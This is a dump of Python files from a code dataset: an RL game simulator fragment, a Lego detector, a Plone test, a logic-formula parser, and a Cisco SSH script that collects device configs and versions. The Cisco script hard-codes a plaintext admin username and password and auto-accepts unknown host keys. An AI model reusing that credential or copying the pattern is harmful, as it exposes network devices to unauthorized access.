proper direction\n # _screen[0][4] = 0 # right_down[0] - my_x\n # _screen[0][5] = 0 # if True else 1 # 1 if needs to grow wide\n\n # shape\n self._screen_rectangle[0][6] = data[2] # growing_wide\n self._screen_rectangle[0][7] = data[3] # width\n\n # reward counter\n self._screen_rectangle[0][8] = (len(data) - 4) / 2\n\n self.reward_rectangle = (self.previous_size_rect - len(data)) * 50 if self.previous_size_rect > 0 else 0\n self.previous_size_rect = len(data)\n terminal = len(data) == 4\n\n return terminal\n\n def get_rect_points(self):\n # todo: get index of ground from server, cheatsy doodles\n ground = self.simulator.rectangle_ground\n\n # if left:\n # find closest x-wise obstacle with top<=ground_top and right<=ground_left\n closest_ground_left = None\n for obs in self.obstacles_rect:\n # obstacle below and to the left of current ground\n # Highest obstacle, if multiple, then the right-most one\n if ground.top_y <= obs.top_y and obs.right_x < ground.left_x:\n if closest_ground_left is None or \\\n obs.top_y < closest_ground_left.top_y or \\\n (closest_ground_left.right_x < obs.right_x and obs.top_y == closest_ground_left.top_y):\n closest_ground_left = obs\n\n if closest_ground_left is not None:\n # calculate distance between obs_right and ground_left\n hole_width = ground.left_x - closest_ground_left.right_x\n else:\n hole_width = 0\n\n # return [ground_left, obs_right-ground_left], aka [hole start position, hole width]\n hole_left = [ground.left_x, hole_width]\n # else:\n # find closest x-wise obstacle with top<=ground_top and ground_right < left\n closest_ground_right = None\n for obs in self.obstacles_rect:\n # obstacle below and to the right of current ground\n # Highest obstacle, if multiple, then the right-most one\n if ground.top_y <= obs.top_y and ground.right_x < obs.left_x:\n if closest_ground_right is None or \\\n obs.top_y < closest_ground_right.top_y or \\\n (obs.left_x < closest_ground_right.left_x and obs.top_y == closest_ground_right.top_y):\n closest_ground_right = obs\n\n if closest_ground_right is not None:\n # calculate distance between obs_right and ground_left\n hole_width = closest_ground_right.left_x - ground.right_x\n else:\n hole_width = 0\n\n # return [ground_left, obs_right-ground_left], aka [hole start position, hole width]\n hole_right = [ground.right_x, hole_width]\n\n return hole_left, hole_right\n\n def circle_output(self, data):\n # [ closest_reward_x, closest_reward_y,\n # left_hole_x, left_hole_width,\n # right_hole_x, right_hole_width,\n # jumping boolean, ceiling distance,\n # reward_counter ]\n\n my_x = data[0]\n my_y = data[1]\n\n # closest reward\n rwrd1, rwrd2, rwrd3 = (1000, 1000), (1000, 1000), (1000, 1000)\n if len(data) > 4:\n rwrd1 = (data[4] - my_x, data[5] - my_y)\n if len(data) > 6:\n rwrd2 = (data[6] - my_x, data[7] - my_y)\n if len(data) > 8:\n rwrd3 = (data[8] - my_x, data[9] - my_y)\n d1 = math.sqrt(rwrd1[0] ** 2 + rwrd1[1] ** 2)\n d2 = math.sqrt(rwrd2[0] ** 2 + rwrd2[1] ** 2)\n d3 = math.sqrt(rwrd3[0] ** 2 + rwrd3[1] ** 2)\n if d1 < d2 and d1 < d3:\n self._screen_circle[0][0], self._screen_circle[0][1] = rwrd1[0], rwrd1[1]\n elif d2 < d1 and d2 < d3:\n self._screen_circle[0][0], self._screen_circle[0][1] = rwrd2[0], rwrd2[1]\n elif d3 < d1 and d3 < d2:\n self._screen_circle[0][0], self._screen_circle[0][1] = rwrd3[0], rwrd3[1]\n\n # platforms in both directions\n ground, ceil, left_down, left_up, right_down, right_up = self.get_circ_points(my_x, my_y)\n\n # if target below, show holes, else show platforms!\n if self._screen_circle[0][1] < 0:\n self._screen_circle[0][2] = left_up[0] - my_x\n self._screen_circle[0][3] = left_up[1] - my_y\n self._screen_circle[0][4] = right_up[0] - my_x\n self._screen_circle[0][5] = right_up[1] - my_y\n else:\n self._screen_circle[0][2] = left_down[0] - my_x\n self._screen_circle[0][3] = left_down[1] - my_y\n self._screen_circle[0][4] = right_down[0] - my_x\n self._screen_circle[0][5] = right_down[1] - my_y\n\n # jump\n self._screen_circle[0][6] = 1 if abs(data[3]) > 0.1 else 0 # jumping\n self._screen_circle[0][7] = ceil.bot_y - my_y # ceiling distance\n\n # SPEEDS\n self._screen_circle[0][8] = data[2] # jumping\n self._screen_circle[0][9] = data[3] # ceiling distance\n\n # reward counter\n self._screen_circle[0][10] = (len(data) - 4) / 2\n\n self.reward_circle = (self.previous_size_circ - len(data)) * 50 if self.previous_size_circ > 0 else 0\n self.previous_size_circ = len(data)\n terminal = len(data) == 4\n\n return terminal\n\n def get_circ_points(self, my_x, my_y):\n # todo: get index of ground from server, cheatsy doodles\n ground = self.simulator.circle_ground\n ceil = getObstacleAbovePoint(my_x, my_y, self.obstacles_circ)\n\n # move left until fall or wall\n index = -1\n for i, obs in enumerate(self.obstacles_circ):\n if ground.left_x <= obs.right_x < my_x and obs.top_y < my_y < ground.top_y <= obs.bot_y:\n if index == -1 or self.obstacles_circ[index].right_x < obs.right_x:\n index = i\n if index == -1: # no walls found, there must be something below\n fallZoneLeft = getObstacleBelowPoint(ground.left_x, ground.top_y, self.obstacles_circ)\n left_down = (ground.left_x, fallZoneLeft.top_y)\n else:\n left_down = (self.obstacles_circ[index].right_x, ground.top_y)\n\n index = -1\n # find any wall to the left\n for i, obs in enumerate(self.obstacles_circ):\n if obs.right_x < my_x and obs.top_y < my_y: # wall to the left\n if index == -1 or self.obstacles_circ[index].right_x < obs.right_x: # closest wall\n being_blocked = False\n for ceiling in self.obstacles_circ: # nothing blocking the top right corner\n if ceiling.left_x < obs.right_x < ceiling.right_x and obs.top_y < ceiling.bot_y < my_y:\n being_blocked = True\n break\n if not being_blocked:\n index = i\n if index == -1:\n index = 2\n left_up = (self.obstacles_circ[index].right_x, self.obstacles_circ[index].top_y)\n\n # move right until fall or wall\n index = -1\n for i, obs in enumerate(self.obstacles_circ):\n if my_x < obs.left_x <= ground.right_x and obs.top_y < my_y < ground.top_y <= obs.bot_y:\n if index == -1 or obs.left_x < self.obstacles_circ[index].left_x:\n index = i\n if index == -1: # no walls found, there must be something below\n fallZoneRight = getObstacleBelowPoint(ground.right_x, ground.top_y, self.obstacles_circ)\n right_down = (ground.right_x, fallZoneRight.top_y)\n else:\n right_down = (self.obstacles_circ[index].left_x, ground.top_y)\n\n index = -1\n for i, obs in enumerate(self.obstacles_circ):\n if my_x < obs.left_x and obs.top_y < my_y: # wall to the right\n if index == -1 or obs.left_x < self.obstacles_circ[index].left_x: # closest wall\n being_blocked = False\n for ceiling in self.obstacles_circ: # nothing blocking the top left corner\n if ceiling.left_x < obs.left_x < ceiling.right_x and obs.top_y < ceiling.bot_y < my_y:\n being_blocked = True\n break\n if not being_blocked:\n index = i\n if index == -1:\n index = 3\n right_up = (self.obstacles_circ[index].left_x, self.obstacles_circ[index].top_y)\n\n return ground, ceil, left_down, left_up, right_down, right_up\n\n # return hole_left, hole_right\n\n\ndef readSocketInput(simulator, _screen, reward, terminal, obstacles, previous_size, len_points, data, move_counter=0,\n output_type=OutputType.FULL):\n # STATE = corner points (2*4), position (2x1), speed (2x1), rewards (2xN), dists (N), exist (N), counter (1)\n\n if len(data) == 4: # number of circle info points\n terminal = True\n # print(\"Terminal\")\n\n if output_type == OutputType.RETINA:\n ground, ceil, \\\n (_screen[0][0], _screen[0][1]), \\\n (_screen[0][2], _screen[0][3]), \\\n (_screen[0][4], _screen[0][5]), \\\n (_screen[0][6], _screen[0][7]) = getPoints(float(data[0]), float(data[1]), obstacles)\n\n _screen[0][8] = ground.top_y\n _screen[0][9] = ceil.bot_y\n\n # convert input into screen\n for i in range(len(data)):\n try:\n _screen[0][i + len_points] = float(data[i])\n except:\n print(\":\" + data[i] + \": \" + str(data))\n\n # if previous_size > 0 and previous_size - len(data)>0:\n # print(\"RAW\",_screen)\n\n # make things relative by subtracting (x,y) (indexes 8,9) from them\n for i in range(len_points - 2):\n _screen[0][i] = _screen[0][i] - _screen[0][len_points + i % 2]\n for i in range(len_points - 2, len_points):\n _screen[0][i] = _screen[0][i] - _screen[0][len_points + 1]\n for i in range(4 + len_points, len(data) + len_points):\n _screen[0][i] = _screen[0][i] - _screen[0][len_points + i % 2]\n\n # replicate missing rewards\n if len(data) > 4:\n for i in range(len(data) + len_points, len(_screen[0]) - 3):\n _screen[0][i] = _screen[0][4 + len_points + i % (len(data) - 4)]\n\n # calculate distances\n _screen[0][20] = math.sqrt(_screen[0][14] ** 2 + _screen[0][15] ** 2)\n _screen[0][21] = math.sqrt(_screen[0][16] ** 2 + _screen[0][17] ** 2)\n _screen[0][22] = math.sqrt(_screen[0][18] ** 2 + _screen[0][19] ** 2)\n\n elif output_type == OutputType.SIMPLE:\n # walls left and right\n ground, ceil, left_down, left_up, right_down, right_up = getPoints(float(data[0]), float(data[1]), obstacles)\n _screen[0][0] = left_down[0] - float(data[0])\n _screen[0][1] = right_down[0] - float(data[0])\n\n # speed\n _screen[0][2] = float(data[2])\n _screen[0][3] = float(data[3])\n\n # closest reward\n rwrd1, rwrd2, rwrd3 = (1000, 1000), (1000, 1000), (1000, 1000)\n if len(data) > 4:\n rwrd1 = (float(data[4]) - float(data[0]), float(data[5]) - float(data[1]))\n if len(data) > 6:\n rwrd2 = (float(data[6]) - float(data[0]), float(data[7]) - float(data[1]))\n if len(data) > 8:\n rwrd3 = (float(data[8]) - float(data[0]), float(data[9]) - float(data[1]))\n d1 = math.sqrt(rwrd1[0] ** 2 + rwrd1[1] ** 2)\n d2 = math.sqrt(rwrd2[0] ** 2 + rwrd2[1] ** 2)\n d3 = math.sqrt(rwrd3[0] ** 2 + rwrd3[1] ** 2)\n if d1 < d2 and d1 < d3:\n _screen[0][4], _screen[0][5] = float(data[4]) - float(data[0]), float(data[5]) - float(data[1])\n elif d2 < d1 and d2 < d3:\n _screen[0][4], _screen[0][5] = float(data[6]) - float(data[0]), float(data[7]) - float(data[1])\n elif d3 < d1 and d3 < d2:\n _screen[0][4], _screen[0][5] = float(data[8]) - float(data[0]), float(data[9]) - float(data[1])\n\n # reward counter\n _screen[0][6] = (len(data) - 4) / 2\n\n # move, just stats, time\n _screen[0][7] = 0 # move_counter\n _screen[0][8] = 1 if (ground.top_y - float(data[1])) > 41 else 0\n _screen[0][9] = 1 if (ceil.bot_y - float(data[1])) < -326 else 0\n _screen[0][10] = _screen[0][10] + 1\n\n else:\n ground, ceil, \\\n (_screen[0][0], _screen[0][1]), \\\n (_screen[0][2], _screen[0][3]), \\\n (_screen[0][4], _screen[0][5]), \\\n (_screen[0][6], _screen[0][7]) = getPoints(float(data[0]), float(data[1]), obstacles)\n\n _screen[0][8] = ground.top_y\n _screen[0][9] = ceil.bot_y\n\n # convert input into screen\n for i in range(len(data)):\n try:\n _screen[0][i + len_points] = float(data[i])\n except:\n print(\":\" + data[i] + \": \" + str(data))\n\n # if previous_size > 0 and previous_size - len(data)>0:\n # print(\"RAW\",_screen)\n\n # make things relative by subtracting (x,y) (indexes 8,9) from them\n for i in range(len_points - 2):\n _screen[0][i] = _screen[0][i] - _screen[0][len_points + i % 2]\n for i in range(len_points - 2, len_points):\n _screen[0][i] = _screen[0][i] - _screen[0][len_points + 1]\n for i in range(4 + len_points, len(data) + len_points):\n _screen[0][i] = _screen[0][i] - _screen[0][len_points + i % 2]\n\n # calculate distances\n _screen[0][20] = math.sqrt(_screen[0][14] ** 2 + _screen[0][15] ** 2)\n _screen[0][21] = math.sqrt(_screen[0][16] ** 2 + _screen[0][17] ** 2)\n _screen[0][22] = math.sqrt(_screen[0][18] ** 2 + _screen[0][19] ** 2)\n\n # binary: reward exists?\n _screen[0][23] = 1 if len(data) > 4 else 0\n _screen[0][24] = 1 if len(data) > 6 else 0\n _screen[0][25] = 1 if len(data) > 8 else 0\n\n # reward counter\n _screen[0][26] = _screen[0][23] + _screen[0][24] + _screen[0][25]\n\n _screen[0][27] = move_counter # move counter\n _screen[0][28] = 1 if _screen[0][8] > 41 else 0 # is jumping\n _screen[0][29] = 1 if _screen[0][9] < -326 else 0 # can jump\n _screen[0][30] = _screen[0][29] + 1 # time counter\n\n # turn leftover space in screen to 0s\n # for i in range(len(data) + 8, len(self._screen_circle[0])):\n # self._screen_circle[0][i] = 0\n # self._screen_circle[0][i] = 1000 # also could be turn to 1000 with relative distances\n\n # positive reward when data decreases (because a collectible was caught)\n if previous_size > 0:\n reward = (previous_size - len(data)) * 50\n previous_size = len(data)\n\n return _screen, reward, terminal, previous_size\n\n\ndef getObstacleBelowPoint(my_x, my_y, obstacles):\n index = 0 # default ground\n for i, obs in enumerate(obstacles):\n if obs.left_x < my_x < obs.right_x and my_y < obs.top_y < obstacles[index].top_y:\n index = i\n return obstacles[index]\n\n\ndef getObstacleAbovePoint(my_x, my_y, obstacles):\n index = 1 # default ground\n for i, obs in enumerate(obstacles):\n if obs.left_x < my_x < obs.right_x and my_y > obs.bot_y > obstacles[index].bot_y:\n index = i\n return obstacles[index]\n\n\ndef getPoints(my_x, my_y, obstacles):\n # get ground obstacle below circle\n ground = getObstacleBelowPoint(my_x, my_y, obstacles)\n ceil = getObstacleAbovePoint(my_x, my_y, obstacles)\n\n # move left until fall or wall\n index = -1\n for i, obs in enumerate(obstacles):\n if ground.left_x <= obs.right_x < my_x and obs.top_y < my_y < ground.top_y <= obs.bot_y:\n if index == -1 or obstacles[index].right_x < obs.right_x:\n index = i\n if index == -1: # no walls found, there must be something below\n fallZoneLeft = getObstacleBelowPoint(ground.left_x, ground.top_y, obstacles)\n left_down = (ground.left_x, fallZoneLeft.top_y)\n else:\n left_down = (obstacles[index].right_x, ground.top_y)\n\n index = -1\n # find any wall to the left\n for i, obs in enumerate(obstacles):\n if obs.right_x < my_x and obs.top_y < my_y: # wall to the left\n if index == -1 or obstacles[index].right_x < obs.right_x: # closest wall\n being_blocked = False\n for ceiling in obstacles: # nothing blocking the top right corner\n if ceiling.left_x < obs.right_x < ceiling.right_x and obs.top_y < ceiling.bot_y < my_y:\n being_blocked = True\n break\n if not being_blocked:\n index = i\n if index == -1:\n index = 2\n left_up = (obstacles[index].right_x, obstacles[index].top_y)\n\n # move right until fall or wall\n index = -1\n for i, obs in enumerate(obstacles):\n if my_x < obs.left_x <= ground.right_x and obs.top_y < my_y < ground.top_y <= obs.bot_y:\n if index == -1 or obs.left_x < obstacles[index].left_x:\n index = i\n if index == -1: # no walls found, there must be something below\n fallZoneRight = getObstacleBelowPoint(ground.right_x, ground.top_y, obstacles)\n right_down = (ground.right_x, fallZoneRight.top_y)\n else:\n right_down = (obstacles[index].left_x, ground.top_y)\n\n index = -1\n for i, obs in enumerate(obstacles):\n if my_x < obs.left_x and obs.top_y < my_y: # wall to the right\n if index == -1 or obs.left_x < obstacles[index].left_x: # closest wall\n being_blocked = False\n for ceiling in obstacles: # nothing blocking the top left corner\n if ceiling.left_x < obs.left_x < ceiling.right_x and obs.top_y < ceiling.bot_y < my_y:\n being_blocked = True\n break\n if not being_blocked:\n index = i\n if index == -1:\n index = 3\n right_up = (obstacles[index].left_x, obstacles[index].top_y)\n\n return ground, ceil, left_down, left_up, right_down, right_up\n","sub_path":"PursuitDDQN/src/simulator/GymGF2.py","file_name":"GymGF2.py","file_ext":"py","file_size_in_byte":30916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"421982085","text":"import os\nimport threading\nimport time\nimport numpy as np\nimport tensorflow as tf\nimport logging\nfrom pathlib import Path\n\nfrom lego_sorter_server.analysis.detection import DetectionUtils\nfrom lego_sorter_server.analysis.detection.DetectionResults import DetectionResults\nfrom lego_sorter_server.analysis.detection.DetectionUtils import crop_with_margin\n\nfrom lego_sorter_server.analysis.detection.detectors.LegoDetector import LegoDetector\n\n\nclass ThreadSafeSingleton(type):\n _instances = {}\n _singleton_lock = threading.Lock()\n\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n with cls._singleton_lock:\n if cls not in cls._instances:\n cls._instances[cls] = super(ThreadSafeSingleton, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\n\nclass TFLegoDetector(LegoDetector, metaclass=ThreadSafeSingleton):\n\n def __init__(self, model_path=os.path.join(\"lego_sorter_server\", \"analysis\", \"detection\", \"models\", \"tf_model\",\n \"saved_model\")):\n self.__initialized = False\n self.model_path = Path(model_path).absolute()\n\n @staticmethod\n def prepare_input_tensor(image):\n input_tensor = tf.convert_to_tensor(image)\n input_tensor = input_tensor[tf.newaxis, ...]\n return input_tensor\n\n def __initialize__(self):\n if self.__initialized:\n raise Exception(\"TFLegoDetector already initialized\")\n\n if not self.model_path.exists():\n logging.error(f\"[TFLegoDetector] No model found in {str(self.model_path)}\")\n raise RuntimeError(f\"[TFLegoDetector] No model found in {str(self.model_path)}\")\n\n start_time = time.time()\n self.model = tf.saved_model.load(str(self.model_path))\n elapsed_time = time.time() - start_time\n\n logging.info(\"Loading model took {} seconds\".format(elapsed_time))\n self.__initialized = True\n\n def detect_lego(self, image: np.array) -> DetectionResults:\n if not self.__initialized:\n logging.info(\"TFLegoDetector is not initialized, this process can take a few seconds for the first time.\")\n self.__initialize__()\n\n input_tensor = self.prepare_input_tensor(image)\n detections = self.model(input_tensor)\n num_detections = int(detections.pop('num_detections'))\n detections = {key: value[0, :num_detections].numpy() for key, value in detections.items()}\n detections['num_detections'] = num_detections\n # detection_classes should be ints.\n detections['detection_classes'] = detections['detection_classes'].astype(np.int64)\n\n detections = self.discard_results_under_threshold(detections)\n\n return DetectionResults.from_dict(detections)\n\n def detect_and_crop(self, image):\n width, height = image.size\n image_resized, scale = DetectionUtils.resize(image, 640)\n detections = self.detect_lego(np.array(image_resized))\n detected_counter = 0\n new_images = []\n for i in range(100):\n if detections.detection_scores[i] < 0.5:\n break # IF SORTED\n\n detected_counter += 1\n ymin, xmin, ymax, xmax = [int(i * 640 * 1 / scale) for i in detections.detection_boxes[i]]\n\n # if bb is out of bounds\n if ymax >= height or xmax >= width:\n continue\n\n new_images += [crop_with_margin(image, ymin, xmin, ymax, xmax)]\n\n return new_images\n\n @staticmethod\n def discard_results_under_threshold(detections, threshold=0.1):\n limit = 1\n\n for index, score in enumerate(detections['detection_scores']):\n if score < threshold:\n limit = index\n break\n\n return {\n \"detection_scores\": detections[\"detection_scores\"][:limit],\n \"detection_classes\": detections[\"detection_classes\"][:limit],\n \"detection_boxes\": detections[\"detection_boxes\"][:limit]\n }\n","sub_path":"lego_sorter_server/analysis/detection/detectors/TFLegoDetector.py","file_name":"TFLegoDetector.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"161154122","text":"import os, sys\nif __name__ == '__main__':\n execfile(os.path.join(sys.path[0], 'framework.py'))\n\nfrom Products.PloneTestCase import PloneTestCase\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.DiPP.config import PID, label, address, port\n\nPloneTestCase.installProduct('ATVocabularyManager')\nPloneTestCase.installProduct('CMFOpenflow')\nPloneTestCase.installProduct('DiPPContent')\nPloneTestCase.installProduct('LinguaPlone')\nPloneTestCase.installProduct('PloneLanguageTool')\nPloneTestCase.installProduct('TextIndexNG3')\nPloneTestCase.installProduct('DiPP')\nPloneTestCase.setupPloneSite(products=('DiPP',))\n\n\nclass TestMetadata(PloneTestCase.PloneTestCase):\n\n PID = PID\n label = label\n address = address\n port = port\n \n def afterSetUp(self):\n #self.portal.manage_addProduct['DiPP'].manage_addTool('Fedora2DiPP3')\n self.tool = getToolByName(self.portal, 'fedora')\n self.typestool = getToolByName(self.portal, 'portal_types')\n \n def testSetFedoraPID(self):\n self.setRoles(['Manager'])\n self.tool.manage_setFedoraSettings(self.PID, None, None, None, None)\n self.assertEquals(self.tool.PID, self.PID)\n \n def testSetFedoraLabel(self):\n self.setRoles(['Manager'])\n self.tool.manage_setFedoraSettings(None, self.label, None, None, None)\n self.assertEquals(self.tool.label, self.label)\n\n def testSetFedoraAddress(self):\n self.setRoles(['Manager'])\n self.tool.manage_setFedoraSettings(None, None, self.address, None, None)\n self.assertEquals(self.tool.address, self.address)\n\n def testSetFedoraPort(self):\n self.setRoles(['Manager'])\n self.tool.manage_setFedoraSettings(None, None, None, self.port, None)\n self.assertEquals(self.tool.port, self.port)\n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n suite.addTest(makeSuite(TestMetadata))\n return suite\n\nif __name__ == '__main__':\n framework()\n","sub_path":"Products/DiPP/tests/test_tool.py","file_name":"test_tool.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"524115904","text":"\"\"\"Istinitosna vrijednost, i jednostavna optimizacija, formula logike sudova.\n\nStandardna definicija iz [Vuković, Matematička logika]:\n* Propozicijska varijabla (P0, P1, P2, ..., P9, P10, P11, ....) je formula\n* Ako je F formula, tada je i !F formula (negacija)\n* Ako su F i G formule, tada su i (F&G), (F|G), (F->G) i (F<->G) formule\nSve zagrade (oko binarnih veznika) su obavezne!\n\nInterpretacija se zadaje imenovanim argumentima (**interpretacija):\n formula.vrijednost(P2=True, P7=False, P1=True, ...)\n\nOptimizacija (formula.optim()) zamjenjuje potformule oblika !!F sa F.\n\"\"\"\n\n\nfrom pj import *\n\n\nclass LS(enum.Enum):\n NEG, KONJ, DISJ, OTV, ZATV = '!&|()'\n KOND, BIKOND = '->', '<->'\n class PVAR(Token):\n def vrijednost(self, **interpretacija):\n return pogledaj(interpretacija, self)\n def optim(self): return self\n\n\ndef ls_lex(kôd):\n lex = Tokenizer(kôd)\n for znak in iter(lex.čitaj, ''):\n if znak == 'P':\n prvo = lex.čitaj()\n if not prvo.isdigit(): lex.greška('očekivana znamenka')\n if prvo != '0': lex.zvijezda(str.isdigit)\n yield lex.token(LS.PVAR)\n elif znak == '-':\n lex.pročitaj('>')\n yield lex.token(LS.KOND)\n elif znak == '<':\n lex.pročitaj('-'), lex.pročitaj('>')\n yield lex.token(LS.BIKOND)\n else: yield lex.literal(LS)\n\n\n### Beskontekstna gramatika:\n# formula -> NEG formula | PVAR | OTV formula binvez formula ZATV\n# binvez -> KONJ | DISJ | KOND | BIKOND\n\n\n### Apstraktna sintaksna stabla (i njihovi atributi):\n# PVAR (Token, odozgo): tip, sadržaj\n# Negacija: ispod\n# Binarna: veznik lijevo desno\n\n\nclass LSParser(Parser):\n def formula(self):\n if self >> LS.PVAR: return self.zadnji\n elif self >> LS.NEG: \n ispod = self.formula()\n return Negacija(ispod)\n elif self >> LS.OTV:\n lijevo = self.formula()\n veznik = self.pročitaj(LS.KONJ, LS.DISJ, LS.KOND, LS.BIKOND)\n desno = self.formula()\n self.pročitaj(LS.ZATV)\n return Binarna(veznik, lijevo, desno)\n else: raise self.greška()\n\n start = formula\n\n\nclass Negacija(AST('ispod')):\n def vrijednost(formula, **interpretacija):\n return not formula.ispod.vrijednost(**interpretacija)\n\n def optim(self):\n ispod_opt = self.ispod.optim()\n if ispod_opt ^ Negacija: return ispod_opt.ispod \n else: return Negacija(ispod_opt)\n\n\nclass Binarna(AST('veznik lijevo desno')):\n def vrijednost(formula, **interpretacija):\n v = formula.veznik\n l = formula.lijevo.vrijednost(**interpretacija)\n d = formula.desno.vrijednost(**interpretacija)\n if v ^ LS.DISJ: return l or d\n elif v ^ LS.KONJ: return l and d\n elif v ^ LS.KOND: return l <= d\n elif v ^ LS.BIKOND: return l == d\n else: assert False, 'nepokriveni slučaj'\n\n def optim(self):\n lijevo_opt = self.lijevo.optim()\n desno_opt = self.desno.optim()\n return Binarna(self.veznik, lijevo_opt, desno_opt)\n\n\nif __name__ == '__main__':\n ulaz = '!(P5&!!(P3->P0))'\n print(ulaz)\n\n tokeni = list(ls_lex(ulaz))\n print(*tokeni)\n # NEG'!' OTV'(' PVAR'P5' KONJ'&' NEG'!' NEG'!'\n # OTV'(' PVAR'P3' KOND'->' PVAR'P0' ZATV')' ZATV')'\n\n fo = LSParser.parsiraj(tokeni)\n print(fo)\n # Negacija(\n # ispod=Binarna(\n # veznik=KONJ'&',\n # lijevo=PVAR'P5',\n # desno=Negacija(\n # ispod=Negacija(\n # ispod=Binarna(\n # veznik=KOND'->',\n # lijevo=PVAR'P3',\n # desno=PVAR'P0'\n # )\n # )\n # )\n # )\n # )\n \n fo = fo.optim()\n print(fo)\n # Negacija(\n # ispod=Binarna(\n # veznik=KONJ'&',\n # lijevo=PVAR'P5',\n # desno=Binarna(\n # veznik=KOND'->',\n # lijevo=PVAR'P3',\n # desno=PVAR'P0'\n # )\n # )\n # )\n \n print(fo.vrijednost(P0=False, P3=True, P5=False))\n # True\n\n# DZ: implementirajte još neke optimizacije: npr. F|!G u G->F.\n# DZ: Napravite totalnu optimizaciju negacije: svaka formula s najviše jednim !\n# (Za ovo bi vjerojatno bilo puno lakše imati po jedno AST za svaki veznik.)\n","sub_path":"PJ/01_logika_sudova.py","file_name":"01_logika_sudova.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"120107246","text":"import paramiko\nimport csv\nimport re\nimport os\nimport logging\nimport socket\nimport pandas\n\n\n# Function to stablish SSH session to device and execute a command or set of commands received from the main function\ndef connect_to_device(ip_address, username, password, command_to_run):\n print(\"\\n------------------------------------------------------\")\n print(\"--- Attempting paramiko connection to: \", ip_address)\n\n try:\n # Create paramiko session\n ssh_client = paramiko.SSHClient()\n\n # Must set missing host key policy since we don't have the SSH key stored in the 'known_hosts' file\n ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n # Make the connection to our host.\n ssh_client.connect(hostname=ip_address,\n username=username,\n password=password)\n\n # If there is an issue, paramiko will throw an exception, so the SSH request must have succeeded.\n print(\"--- Success! connecting to: \", ip_address)\n except paramiko.AuthenticationException:\n logger.debug(\"Authentication failed, please verify your credentials: %s\")\n except socket.error as strerror:\n logger.debug(\"TCP Error connection: %s\" % strerror)\n except paramiko.SSHException as strerror:\n logger.debug(\"Unable to establish SSH connection: %s\" + strerror)\n\n try:\n # Runs the command received from the function call\n stdin, stdout, stderr = ssh_client.exec_command(command_to_run)\n command_result = stdout.readlines()\n except paramiko.SSHException as strerror:\n logger.debug(\"SSH Error - %s \" + strerror)\n\n # Returns the output of the command received\n return command_result\n\n\ndef main():\n # Read list of ips to connect from CSV file and skips the first row\n logger.debug(\"Getting list of devices from CSV File\")\n host_list = open(r\"C:\\Users\\jjimenez\\Documents\\GitHub\\Cisco\\Devices.csv\", \"rt\")\n read_file = csv.reader(host_list)\n next(read_file)\n\n counter = 1\n device_dictionary = {}\n current_path = os.getcwd()\n\n # Loops the content of the of the CSV file and performs the operations \"show run\" and \"show version\"\n for row in read_file:\n row_str = ' '.join(row)\n\n # Get hostname from list and leave only the name from the list\n logger.debug(\"Connecting to Device \" + row_str + \"to get hostname\")\n hostname = connect_to_device(row_str, \"crgadmin\", \"CRG3mpow3rs@dm1n\", \"show run | inc hostname\")\n\n for hn in hostname:\n if \"hostname\" in hn:\n str_hostname = hn\n break\n\n logger.debug(\"Device hostname = \" + str_hostname)\n str_hostname = str_hostname[9:-2]\n dir_name = str_hostname\n str_hostname = str_hostname.rstrip() + \".txt\"\n\n # To get the output of show run and save to a file\n logger.debug(\"Connecting to Device \" + row_str + \"to get output of show run\")\n show_run_output = connect_to_device(row_str, \"crgadmin\", \"CRG3mpow3rs@dm1n\", \"sh run\")\n os.mkdir(current_path + \"\\\\outputs\\\\Devices\\\\\" + dir_name)\n os.mkdir(current_path + \"\\\\outputs\\\\Devices\\\\\" + dir_name + \"\\\\run\")\n file_path = current_path + \"\\\\outputs\\\\Devices\\\\\" + dir_name + \"\\\\run\\\\sh_run_\" + str_hostname\n try:\n my_output_file = open(file_path, \"w\")\n my_output_file.writelines(show_run_output)\n my_output_file.close()\n logger.debug(\"Writing show run to txt file\")\n except IOError as strerror:\n logger.debug(\"Error creating File %s \" + strerror)\n\n # To get the output of show version and save to a file\n logger.debug(\"Connecting to Device \" + row_str + \"to get output of show version\")\n show_ver_output = connect_to_device(row_str, \"crgadmin\", \"CRG3mpow3rs@dm1n\", \"sh version\")\n os.mkdir(current_path + \"\\\\outputs\\\\Devices\\\\\" + dir_name + \"\\\\version\")\n file_path = current_path + \"\\\\outputs\\\\Devices\\\\\" + dir_name + \"\\\\version\\\\sh_ver_\" + str_hostname\n try:\n my_output_file = open(file_path, \"w\")\n my_output_file.writelines(show_ver_output)\n my_output_file.close()\n except IOError as strerror:\n logger.debug(\"Error creating File %s \" + strerror)\n\n # Get the IOS version from the show run\n logger.debug(\"Converting output of show version to string to find IOS version on the string\")\n show_ver_str = ' '.join(show_ver_output)\n version_pattern = re.compile(\"Version ([0-9]*\\.[0-9][\\(\\)0-9a-zA-Z]*)\")\n device_ios_version = re.search(version_pattern, show_ver_str).group(1)\n\n # Write information to different arrays so then it can be written into a CSV file\n logger.debug(\"Writing device hostname, IP and IOS to a Python Directory\")\n str_hostname = str_hostname[:-4]\n str_counter = str(counter)\n str_ip = ' '.join(row)\n device_dictionary[str_counter] = {\"hostname\": str_hostname, \"IP\": str_ip, \"IOS\": device_ios_version}\n counter = counter + 1\n\n # To write hostname,ip,ios to a CSV file for audit/report\n logger.debug(\"About to python directory containing device information to csv file\")\n csv_file = current_path + \"\\\\outputs\\\\Device_Info.csv\"\n try:\n pandas.DataFrame.from_dict(device_dictionary,orient=\"index\").to_csv(csv_file)\n except csv.Error as strerror:\n logger.debug(\"Error creating File %s \" + strerror)\n\n\nif __name__ == '__main__':\n # Setting up loggin\n logging.basicConfig(level=logging.DEBUG)\n logger = logging.getLogger(__name__)\n\n handler = logging.FileHandler('process.log')\n handler.setLevel(logging.DEBUG)\n\n # create a logging format\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n\n # add the handlers to the logger\n logger.addHandler(handler)\n 